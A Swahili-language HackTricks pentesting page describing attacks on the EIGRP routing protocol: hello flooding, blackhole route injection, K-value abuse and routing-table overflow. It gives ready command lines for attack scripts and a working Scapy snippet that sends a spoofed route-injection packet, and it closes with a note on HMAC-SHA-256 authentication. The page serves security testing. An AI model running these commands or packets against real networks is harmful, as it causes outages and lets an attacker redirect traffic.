Mashambulizi ya EIGRP
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Hii ni muhtasari wa mashambulizi yaliyofichuliwa katika https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Angalia kwa taarifa zaidi.
Shambulio la Majirani Bandia wa EIGRP
- Lengo: Kuzidisha CPU za router kwa kuzua EIGRP hello packets nyingi, jambo ambalo linaweza kusababisha Denial of Service (DoS).
- Chombo: Script ya helloflooding.py.
- Utekelezaji:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Vigezo:
--interface: Inaonyesha kiolesura cha mtandao, kwa mfano,eth0.--as: Huweka nambari ya autonomous system ya EIGRP, kwa mfano,1.--subnet: Inaweka eneo la subnet, kwa mfano,10.10.100.0/24.
Shambulio la EIGRP Blackhole
- Lengo: Kusababisha usumbufu wa mtiririko wa trafiki kwa kuingiza route bandia, ikielekeza trafiki kwenye blackhole ambapo inapelekwa kwa sehemu zisizokuwepo.
- Chombo: Script ya routeinject.py.
- Utekelezaji:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Vigezo:
--interface: Inaonyesha kiolesura cha mfumo wa mshambuliaji.--as: Huweka nambari ya EIGRP AS.--src: Inaweka anwani ya IP ya mshambuliaji.--dst: Inaweka anwani ya subnet ya lengo.--prefix: Huweka mask ya anwani ya subnet ya lengo.
Shambulio la Uabusu wa K-Values
- Lengo: Kusababisha usumbufu wa kuendelea na kuunganishwa upya ndani ya uwanja wa EIGRP kwa kuingiza K-values zilizobadilishwa, na kwa hivyo kusababisha Denial of Service (DoS).
- Chombo: Script ya relationshipnightmare.py.
- Utekelezaji:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Vigezo:
--interface: Inaonyesha kiolesura cha mtandao.--as: Huweka nambari ya EIGRP AS.--src: Inaweka Anwani ya IP ya router halali.
Shambulio la Kujaa kwa Routing Table
- Lengo: Kuchosha CPU na RAM za router kwa kujaza routing table na routes bandia nyingi.
- Chombo: Script ya routingtableoverflow.py.
- Utekelezaji:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Vigezo:
--interface: Inaonyesha kiolesura cha mtandao.--as: Huweka nambari ya EIGRP AS.--src: Inaweka anwani ya IP ya mshambuliaji.
Vidokezo vya Itifaki Muhimu kwa Mashambulizi
- HELLO packets hubeba K-values na majirani huunda tu pale zinapolingana. Hii ndiyo msingi wa mashambulizi ya K-value mismatch/relationship disruption na kwa nini K-values zisizolingana zinazuia adjacency.
- PARAMETER TLV (Type 0x0001) katika HELLO (na UPDATE ya awali) hubeba K-values na Hold Time, hivyo kurekodi kwa njia pasivu hufichua thamani halisi zinazotumika kwenye sehemu hiyo.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy inatoa layer ya EIGRP contrib yenye TLVs kama EIGRPParam na EIGRPIntRoute, ambazo zinatosha kutengeneza UPDATEs kwa route injection. Mfano uliobadilishwa kutoka kwa script ya davidbombal/scapy ya route injection ya EIGRP:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Repo ile ile ina skripti fupi za “fake neighbor” ambazo sniff pakiti halisi za EIGRP na kuzireplay zikiwa na spoofed source IP ili kuunda phantom neighbors (zinazofaa kwa CPU/neighbor-table pressure).
- Scapy EIGRP contrib nyaraka: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Mifano ya skripti: https://github.com/davidbombal/scapy
Routopsy & NSE Msaada
- Routopsy huunda maabara ya mashambulizi ya virtual-router (FRRouting + Scapy) na inajumuisha DRP attacks ambazo unaweza kuzi-adapt kwa majaribio ya EIGRP. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- NSE ya Nmap ina maktaba ndogo ya
eigrpkwa kuchambua/kuunda sehemu ya pakiti za EIGRP. https://nmap.org/nsedoc/lib/eigrp.html
Uchunguzi wa Uthibitishaji
- EIGRP named mode inaunga mkono HMAC-SHA-256 authentication kupitia
authentication mode hmac-sha-256 .... Ikiwa imewezeshwa, pakiti zilizotengenezwa lazima zihakikiwe kwa kutumia funguo sahihi; ikiwa haijawezeshwa, spoofing/injection ni rahisi kuthibitisha.
Marejeleo
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.


